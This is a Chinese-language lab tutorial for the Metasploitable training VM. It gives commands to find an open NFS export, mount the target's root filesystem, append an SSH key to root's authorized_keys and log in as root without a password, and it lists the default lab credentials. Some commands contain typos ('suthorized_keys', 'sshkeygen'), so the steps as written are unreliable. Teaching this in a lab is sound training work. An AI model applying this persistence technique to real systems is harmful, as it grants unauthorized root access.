1、了解Metasploitables靶机系统漏洞;
2、学习使用Metasploit。
msftables之利用Linux NFS共享目录配置漏洞渗透。
msftables之利用Linux NFS共享目录配置漏洞渗透。
1、学生机与实验室网络直连;
2、VPC1、VPC2与实验室网络直连。
1、打开靶机(登陆用户名:msfadmin 密码:msfadmin),查看靶机的IP地址。
命令:ifconfig
2、打开渗透机(登陆用户名:root 密码:toor)并查看其IP地址。
命令:ifconfig
3、在渗透机kali上查看靶机上的nfs服务是否开启
命令:rpcinfo –p 192.168.10.100
4、在渗透机kali上查看靶机上设置的远程共享目录列表
命令:showmount –e 192.168.10.100
5、生成rsa公钥
命令:sshkeygen
6、在渗透机 /tmp目录下新建文件夹msftables,以备后续挂载需求
命令:mkdir /tmp/msftables
7、把靶机192.168.10.100的根目录挂载到渗透机上新建的/tmp/mstables/目录下;
命令:mount –o nolock –t nfs 192.168.10.100:/ /tmp/msftables/
8、把渗透机上生成的公钥追加到靶机的authorized_keys下
命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/suthorized_keys
9、实现无密码ssh登录
命令:ssh root@192.168.10.100
10、 查看ip地址检测是否已登录到靶机
命令:ifconfig
手机扫一扫
移动阅读更方便
你可能感兴趣的文章